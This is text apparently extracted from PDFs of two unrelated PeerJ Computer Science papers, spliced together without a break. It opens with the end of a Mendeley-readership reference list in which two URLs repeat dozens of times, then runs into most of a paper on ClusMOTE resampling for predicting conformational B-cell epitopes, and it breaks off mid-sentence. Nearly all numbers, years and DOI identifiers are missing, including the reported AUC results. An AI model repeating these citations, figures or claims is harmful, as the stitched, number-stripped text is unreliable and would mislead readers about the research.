association for information science and technology in press. haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / - / / /p http://dx.doi.org/ . / x. . http://dx.doi.org/ . /aris. . http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /j.joi. . . http://dx.doi.org/ . /isu- http://dx.doi.org/ . /f research. . http://dx.doi.org/ . /ajim- - - http://dx.doi.org/ . /asi. http://dx.doi.org/ . /asi. http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. martin b, nightingale p, rafols i. . response to the call for evidence to the independent review of the role of metrics in research assessment. available at https://www.sussex.ac.uk/ webteam/gateway/file.php?name=spru-response-final.pdf&site= . milojević s. . network analysis and indicators. in: ding y, rousseau r, wolfram d, eds. measuring scholarly impact. switzerland: springer international publishing, – doi . / - - - - . mingers j, leydesdorff l. . a review of theory and practice in scientometrics. european journal of operational research ( ): – doi . /j.ejor. . . . mohammadi e, thelwall m. . assessing the mendeley readership of social science and humanities research. in: gorraiz j, schiebel e, gumpenberger c, ho m, eds. proceedings of issi vienna: th international society of scientometrics and informetrics conference. vienna: austrian institute of technology gmbh, – . mohammadi e, thelwall m. . mendeley readership altmetrics for the social sciences and humanities: research evaluation and knowledge flows. journal of the association for information science and technology ( ): – doi . /asi. . mohammadi e, thelwall m, haustein s, larivière v. . who reads research articles? an altmetrics analysis of mendeley user categories. journal of the association for information science and technology ( ): – doi . /asi. . sud p, thelwall m. . not all international collaboration is beneficial: the mendeley readership and citation impact of biochemical research collaboration. journal of the association for information science and technology in press. van eck jn, waltman l. . visualizing bibliometric networks. in: ding y, rousseau r, wolfram d, eds. measuring scholarly impact. switzerland: springer international publishing, – doi . / - - - - . zahedi z, costas r, wouters p. . assessing the impact of publications saved by mendeley users: is there any different pattern among users? in: proceedings of the iatul conferences. paper . available at http://docs.lib.purdue.edu/iatul/ /altmetrics/ (accessed september ). zahedi z, van eck nj. . visualizing readership activity of mendeley users using vosviewer. figshare doi . /m .figshare. . haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= https://www.sussex.ac.uk/webteam/gateway/file.php?name=spru-response-final.pdf&site= http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /asi. http://dx.doi.org/ . /asi. http://dx.doi.org/ . / - - - - _ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://docs.lib.purdue.edu/iatul/ /altmetrics/ http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. networks of reader and country status: an analysis of mendeley reader statistics introduction methods dataset used software and statistics results statistical parameters disciplinary affiliations status hierarchy decomposition in terms of nations discussion conclusions acknowledgements references submitted may accepted april published june corresponding author binti solihah, binti.solihah@mail.ugm.ac.id academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright solihah et al. distributed under creative commons cc-by . open access enhancement of conformational b-cell epitope prediction using clusmote binti solihah , , azhari azhari and aina musdholifah department of computer science and electronics, faculty of mathematics and natural sciences, universitas gadjah mada, yogyakarta, indonesia department of informatics engineering, universitas trisakti, grogol, jakarta barat, indonesia abstract background. a conformational b-cell epitope is one of the main components of vaccine design. it contains separate segments in its sequence, which are spatially close in the antigen chain. the availability of ag-ab complex data on the protein data bank allows for the development predictive methods. several epitope prediction models also have been developed, including learning-based methods. however, the performance of the model is still not optimum. the main problem in learning-based prediction models is class imbalance. methods. this study proposes clusmote, which is a combination of a cluster- based undersampling method and synthetic minority oversampling technique. the approach is used to generate other sample data to ensure that the dataset of the conformational epitope is balanced. the hierarchical dbscan algorithm is performed to identify the cluster in the majority class. some of the randomly selected data is taken from each cluster, considering the oversampling degree, and combined with the minority class data. the balance data is utilized as the training dataset to develop a conformational epitope prediction. furthermore, two binary classification methods, support vector machine and decision tree, are separately used to develop model prediction and to evaluate the performance of clusmote in predicting conformational b-cell epitope. the experiment is focused on determining the best parameter for optimal clusmote. two independent datasets are used to compare the proposed prediction model with state of the art methods. the first and the second datasets represent the general protein and the glycoprotein antigens respectively. result. the experimental result shows that clusmote decision tree outperformed the support vector machine in terms of auc and gmean as performance measurements. the mean auc of clusmote decision tree in the kringelum and the seppa test sets are . and . , respectively. this shows that clusmote decision tree is better than other methods in the general protein antigen, though comparable with seppa in the glycoprotein antigen. subjects bioinformatics, data mining and machine learning keywords cluster-based undersampling, smote, class imbalance, hybrid sampling, hierarchi- cal dbscan, vaccine design introduction a b-cell epitope is among the main components of peptide-based vaccines (andersen, nielsen & lund, ; zhang et al., ; ren et al., ). it can be utilized in how to cite this article solihah b, azhari a, musdholifah a. . enhancement of conformational b-cell epitope prediction using clus- mote. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:binti.solihah@mail.ugm.ac.id https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. immunodetection or immunotherapy to induce an immune response (rubinstein et al., ). many b-cell epitopes are conformational and originate from separate segments of an antigen sequence, forming a spatial neighborhood in the antigen-antibody (ag–ab) complex. identifying epitopes through experiments is tedious and expensive work, and therefore, there is a high risk of failure. current progress in bioinformatics makes it possible to create vaccine designs through d visualization of protein antigen. many characteristics, including composition, cooperativeness, hydrophobicity, and secondary structure, are considered in identifying potential substances for an epitope (kringelum et al., ). since no dominant characteristic helps experts to easily distinguish epitopes from other parts of the antigen, the risk of failure is quite high. the availability of the d structure of the ag–ab complex in the public domain and computational resources eases the development of predictive models using various methods, including the structure and sequence-based approaches. however, the conformational epitope prediction is still challenging. the structure-based approach can be divided into three, including dominant-characteristic-based, graph-based, and learning-based categories. there are several characteristic-based approaches, including ( ) cep, which uses solvent- accessibility properties, ( ) discotope using both solvent-accessibility-based properties and epitope log odds ratio of amino acid, ( ) pepito that adds half-sphere exposure (hse) to log odds ratio of amino acid in discotope and ( ) discotope . , which is an improved version of discotope. it defines the log odd ratios in spatial contexts and adds half-sphere exposure (hse) as a feature, and ( ) seppa, which utilizes exposed and adjacent residual characteristics to form a triangle unit patch (kulkarni-kale, bhosle & kolaskar, ; andersen, nielsen & lund, ; kringelum et al., ; sun et al., ). the dominant-characteristic-based approach is limited by the number of features and the linear relationships between them. the graph-based method is yet another critical method, although only two from the same study were found during the literature review. zhao et al. ( ) developed a subgraph that could represent the planar nature of the epitope. although the model is designed to identify a single epitope, it can also detect multiples. zhao et al. ( ) used features extracted from both antigens and the ag–ab interaction, which is expressed by a coupling graph and later transformed into a general graph. the learning-based approach utilizes machine-learning to work with a large number of features. it also uses nonlinear relationships between features to optimize model performance. rubinstein, mayrose & pupko ( ) used two naïve bayesian classifiers to develop structure-based and sequence-based approaches. seppa . combines amino acid index (aaindex) characteristics in the seppa algorithm in the calculation of cluster coefficients (qi et al., ; kawashima et al., ). aaindex in seppa . is consolidated via artificial neural networks (ann). however, seppa . adds the glycosylation triangles and glycosylation-related aaindex to seppa . (zhou et al., ). glycosylation-related aaindex is consolidated to seppa . via ann. several researchers utilized the advantages of random forest (dalkas & rooman, ; jespersen et al., ; ren et al., ; zhang et al., ). the main challenge in developing a conformational b-cell epitope prediction solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. model is the class imbalance problem. this is a condition where the sample of the target or epitope class is less than that of the nontarget or the non-epitope classes. several methods have been proposed to handle the class imbalance problem. however, studies that focus on handling this issue in epitope prediction models are still limited. ren et al. ( ) and zhang et al. ( ) used simple random undersampling to handle the class imbalance problem. dalkas & rooman ( ) used the support vector machine (svm) synthetic minority over-sampling technique (smote) method, which is a variant of smote. another common approach used is weighted svm, which is included in the cost-sensitive algorithm level category (ren et al., ). additionally, zhang et al. ( ) used a cost-sensitive ensemble approach and proved that the method was superior to easy ensemble, balance cascade and smoteboost (liu, wu & zhou, ; chawla et al., ). currently, several studies focus on class imbalance using various approaches that are mainly divided into four, including data and algorithm levels, cost-sensitive, and ensemble (galar et al., ). in the data level approach, the resampling method is used to ensure a balanced distribution of data (gary, ). the approaches under this category include undersampling, oversampling and a combination of both (drummond & holte, ; estabrooks, jo & japcowick, ; chawla et al., ; chawla et al., ). in the algorithm level, the minority class is specifically considered. most algorithms are equipped with a search system to identify rare patterns (gary, ). the learning process of classifiers usually ignores the minority class. specific recognition algorithms are used to detect rare patterns, providing different misclassification weights between minority and majority classes or different weights (elkan, ; batuwita & palade, ; japkowicz, myers & gluck, ; raskutti & kowalczyk, ). in general, adding cost to an instance is categorized as cost-sensitive in the data level (galar et al., ). the approach is also applied in the ensemble method (blaszczynski & stefanowski, ). however, the determination of the weight is carried out through trial and error. the most common ensemble methods used to handle the class imbalance problem include bagging and boosting. in bagging, a balanced class sample is generated using the bootstrapping mechanism. the sampling methods used in this case include random undersampling and oversampling, as well as smote (blaszczynski & stefanowski, ; galar et al., ). in boosting, samples are selected iteratively and their weight calculated based on the misclassification costs. many boosting variations have been proposed, though the most influential is the adaboost (freund & schapire, ). random oversampling and undersampling are the simplest sampling methods used in balancing data distribution. handling class imbalance in the preprocessing data is versatile since it does not depend on the classifier used. similarly, the random oversampling method is versatile because it does not rely on the classifier used. however, its main drawback is overfitting because new sample data are not added. the smote technique avoids overfitting by interpolating adjacent members of the minority class to create new sample data (chawla et al., ). furthermore, oversampling that considers certain conditions, such as the density distribution and the position of the sample point to the majority class, improves the performance of the classifier (he & garcia, ; han et al., ). random solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. undersampling is a concern in the sense that loss of information from the dataset might occur. this is because of pruning may considerably affect and reduce its performance. to reduce the loss of information, several cluster-based methods have been used in resampling (yen & lee, ; das, krishnan & cook, ; sowah et al., ; tsai et al., ). cluster-based undersampling can be conducted by omitting class labels (yen & lee, ; das, krishnan & cook, ). alternatively, it can be performed only on the negative class (sowah et al., ; lin et al., ; tsai et al., ). das, krishnan & cook ( ) discarded the negative class data that overlap the positive in a specific cluster based on the degree of overlapping. according to yen & lee ( ), the samples from the negative class are proportional to the ones in the positive class in a particular cluster. also, sowah et al. ( ) randomly selected several sample data from each cluster. in tsai et al. ( ), the cluster members were selected using optimization algorithms. clustering samples of the negative to positive class may lead to a suboptimal cluster number of data in the negative class (lin et al., ). in this research, the cluster-based undersampling method is combined with smote to obtain a balanced dataset. the parameter r is defined to determine the proportion of the majority class data sampled and compared with the minority. a classifier model is built with the decision tree (dt) and svm algorithms to assess the performance of the proposed method. material and methods dataset this research uses rubinstein’s dataset as training (rubinstein, mayrose & pupko, ). the formation criteria of the training dataset are explained by rubinstein et al. ( ). the study shows the following, ( ) the ag–ab complex structure should contain antibodies with both heavy and light chains, ( ) contact between antigens and antibodies must occur in the complementarity-determining regions, ( ) the amount of antigen residues binds to antibodies is large, and ( ) the complex used cannot be similar to other complexes, as stated in the structural classification of proteins criteria (murzin et al., ). the training dataset consists of antigen chains derived from d structure ag–ab complexes. the chain list is shown in table s . the complexes are downloaded from the protein data bank (pdb) (berman et al., ). two independent test sets are used, including kringelum and seppa . (kringelum et al., ; chou et al., ). kringelum’s test set consists of antigen chains. data were filtered from antigen chains and thirteen antigens were excluded from the list because they were used as training data with the compared method. the data released include afv, bgx, rvf, xtj, fmg, g j, grw, h , mj , rhw, ri , ria, and rif. the details of zhang’s test set are presented in table s a. the test set represents protein antigen in the general category. it is used to compare the clusmote dt with the discotope . , ellipro, epitopia, epces, pepito and discotope (andersen, nielsen & lund, ; ponomarenko et al., ; rubinstein, mayrose & pupko, ; liang et al., ; sweredoski & baldi, ; kringelum et al., ). the seppa . test set is a glycoprotein category solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. test set. this dataset consists of antigen chains and eight were excluded because they were multiple epitopes, including kem a , kem a , t x g , t x g , tlj x , tlj x , tlk x , and tlk x . the test set was used to compare the clusmote dt with the seppa . seppa . , pepito, epitopia, discotope , cbtope and bepipred . methods (qi et al., ; ansari & raghava, ; jespersen et al., ). the antigen list for the test set is presented in table s b. conformational b-cell epitope prediction method conformational epitopes are residues of exposed antigens that are spatially close, though they form separate segments when viewed from sequences (andersen, nielsen & lund, ). to build a conformational epitope prediction model, the steps needed, as shown in fig. are include ( ) preparing the dataset, ( ) balancing the dataset, and ( ) creating a classification model for the prediction of residual potential epitopes. the preparation step aims to build the training and testing datasets. the number of exposed residues considered as epitopes is less than the exposed residues that are not-epitopes. balancing the dataset is meant to overcome the class imbalance found in step , while the classification model categorizes residues as members of the epitope or non-epitope class. data preprocessing the creation of feature vectors and epitope annotations for the training and testing data is conducted on surface residues only. relatively accessible surface area (rsa) is used as a parameter to distinguish surface and buried residues. different values were used as limits, including the . , . , . , and . thresholds (rubinstein, mayrose & pupko, ; zhang et al., ; kringelum et al., ; ren et al., ; dalkas & rooman, ). this variation affects the imbalance ratio between the data epitope and non-epitope classes. although the standard burial and non-burial threshold are . , the value of . is used as the limit. this is because of the larger the surface exposure threshold, the smaller the predictive performance (basu, bhattacharyya & banerjee, ; kringelum et al., ). choosing . as the limit is relevant to the finding of zheng et al. ( ), where all rsa values of epitopes are positive, though slightly larger than zero. the feature vectors used include accessible surface area (asa), rsa, depth index (di), protrusion index (pi), contact number (cn), hse, quadrant sphere exposure (qse), aaindex, b factor, and log odds ratio, as shown in table . asa and rsa are the key features in determining if a residue is likely to bind to other molecules for accessibility reasons. although several programs can be used to calculate asa, the most commonly used include naccess and dssp (hubbard & thornton, ; kabsch & sander, ). dssp only calculates the total asa per residue, while naccess computes the backbone, side chain, polar, and nonpolar asa. however, naccess can only count one molecular structure at a time. these users need to create additional scripts to count several molecular structures at a time (mihel et al., ). this study used the psaia application was used (mihel et al., ). the psaia is not only limited to counting one molecular structure but can be used to calculate other features, including rsa, pi, and di. no significant difference is observed between the asa calculation results using solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. data preprocessing (feature extraction) clusmote classify at residual level classification model d structure of antigen complex database of d structure of antigen antibody complex contain validated epitope conformational b cell epitope prediction feature extraction epitope candidate figure development stage of conformational b-cell epitopes prediction. . full-size doi: . /peerjcs. /fig- table features for antigenic determinant and the methods to compute. category feature data source/method structural asa psaia mihel et al. ( ) rsa psaia mihel et al. ( ) protrusion index psaia mihel et al. ( ) cn nishikawa & ooi ( ) hse hamelryck ( ) qse li et al. ( ) physicochemical aaindex kawashima et al. ( ) b factor ren et al. ( ) and ren et al. ( ) statistic log-odd ratio andersen, nielsen & lund ( ) notes. asa, solvent-accessible surface area; rsa, relative solvent-accesible surface area; cn, contact number; hse, half- sphere exposure; qse, quadrant sphere exposure; aaindex, amino acid index. naccess and psaia. the asa attribute values used include the backbone, side chain, polar (including oxygen, nitrogen, and phosphorus), and nonpolar atoms (carbon atoms). rsa is the result of the asa value with the maximum figure calculated based on the gxg tripeptide theory, where g is glycine and x is the residual sought (lee & richards, ). solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the maximum value of asa is obtained from tien et al. ( ), which is an improvement of rost & sender ( ) and millerl et al. ( ). there was no difference in the list of datasets obtained using the three methods, as presented in appendix . the rsa attribute values used include the total rsa of all atoms, backbone atoms, side-chain atoms, polar atoms (including oxygen, nitrogen, and phosphorus), and nonpolar atoms (carbon atoms). di: the di of the i th atom refers to its minimum distance to the exposed atoms. the di attribute values used include the average and standard deviation of all atoms, average of side-chain atoms, maximum, and minimum. pi: the pi is the ratio of the space of a sphere with a radius of a centered on c α divided by the area occupied by the heavy atoms constituting proteins (pintar, carugo & pongor, ). in this study, pi was calculated using the psaia software (mihel et al., ). the pi attribute values used include the average and standard deviation of all atoms, average of side-chain atoms, maximum, and minimum. cn, hse, qse: the cn is the total number of c α adjacent to the residue measured under the microsphere environment. it is limited by a ball with radius r centered on c α (nishikawa & ooi, ). in hse, the number of c α was distributed in two areas, including the upper hemisphere and the lower hemisphere balls (hamelryck, ). in qse, the number of c α was specifically distributed in eight regions in the microsphere environment (li et al., ). aaindex: the aaindex consists of indices representing the amino acid physicochemical and biochemical properties (kawashima et al., ). the aaindex value of each residue was extracted from component i of the hdratjci constituents in the aaindex .txt file. the detail of component i of aaindex file is attached as a table s . b factor: the b factor indicates the flexibility of an atom or a residue. an exposed residue has a larger b factor than a latent residue. the b factor for each atom is derived from the pdb data. the attribute values used include the b factor of c α and the average of all atoms or residues (ren et al., ). log odds ratio: this feature is extracted based on the primary protein structure and calculated based on andersen, nielsen & lund ( ). a sliding window of size residues was run in each sequence of antigens in the dataset to form overlapping segments that can be used in the calculation of the appearance of the individual residues. each segment was grouped as an epitope or non-epitope depending on its center. the log odds ratio was calculated at the fifth position residue based on nielsen, lundegaard & worning ( ). in this study, a segment would be included in the calculation in case the fifth position residue is exposed. epitope annotation on the antigen residue is carried out by analyzing the interaction in the psaia software (mihel et al., ) using contact criterion, threshold, and van der waals radii. the maximum distance of was derived from the chotia.radii file. the asa change parameters include the delta asa, z_slice size, and probe radius with values . , . , and . , respectively. the interaction analyzer output is a list of all adjacent residual pairs within the allowable distance range. a procedure for selecting antigen residues that bind to antibodies is created to obtain a list of epitopes. solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. class imbalance dataset minority class (epitope) majority class (non-epitope) clustering-based undersampling randomly selected data from each cluster smote balance datasetnew dataset figure clusmote sampling. full-size doi: . /peerjcs. /fig- handling class imbalance with clusmote resampling with undersampling and oversampling has advantages and disadvantages. therefore, cluster-based sampling was conducted to minimize the loss of information caused by the pruning effect of undersampling. oversampling with smote has often proven to be reliable. merging the two increases classifier performance. a parameter stating the degree of oversampling is used to identify the optimal combination. this study proposed clusmote, a cluster-based undersampling mechanism combined with smote as shown in fig. . negative class data are clustered using the hierarchical density-based spatial clustering of applications with noise (hdbscan) algorithm. this is meant to identify the optimal clusters based on stability (campello, moulavi & sander, ). the number of clusters is less than the positive class data. this means each cluster contains several data. the simplest sampling mechanism is random selection. to select data, the cluster size and degree of oversampling should be considered. the proposed clusmote method uses the following steps, . separate the positive and the negative class data. . cluster the negative class ( −) using the hdbscan algorithm. . take a certain number of data items from each cluster. consider the ratio of the number of clusters to the overall members of the negative class. the samples from the ci cluster is defined in ( ), according to sowah et al. ( ). where mi is the number of minority class samples, ma is the total number of majority classes, m_ci is the number of ci cluster members, and r is the negative class dataset ratio from the cluster. in case r = , the number of negative class datasets to be formed is twice the positive class datasets. the samples are taken from each cluster randomly. size_ci=r×mi×m_ci/ma ( ) . combine positive classes with all datasets taken in step . . carry out smote on the results obtained in step . program implementation was conducted in the java programming environment with netbeans ide . . a new class for implementing the clusmote method was implemented solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. in the java language programming, supported by the jsat statistics library version . (raff, ). classification algorithm two classification algorithms, svm and dt, were used to evaluate the performance of clusmote. generally, svm is a popular learning algorithm used in previous studies of conformational epitope prediction. dt is often used to handle the class imbalance problem and classified as one of the top data mining algorithms (galar et al., ). this study uses the jsat (raff, ) software package, utilizing the pegasos svm with a mini-batch linear kernel (shalev-shwartz, singer & srebro, ). pegasos svm works fast since the primal update process is carried out directly, and no support vector is stored. the default values used for the epoch, regularization, and batch size parameters include , e− , and , respectively. the decision tree is formed by nodes that are built on the principle of decision stump (iba & langley, ). also, the study used a bottom-up pessimistic pruning with error-based pruning from the c . algorithm (quinland, ). the proportion of the data set used for pruning is . . performance measurement of the conformational epitope prediction model a dataset used for conformational epitope prediction contains the class imbalance problem. the area used is mainly under the roc curve (auc) as a performance parameter. in class imbalance, the auc is a better measure than accuracy, which is biased to the majority class. another performance parameter used is f-measure, as expressed in 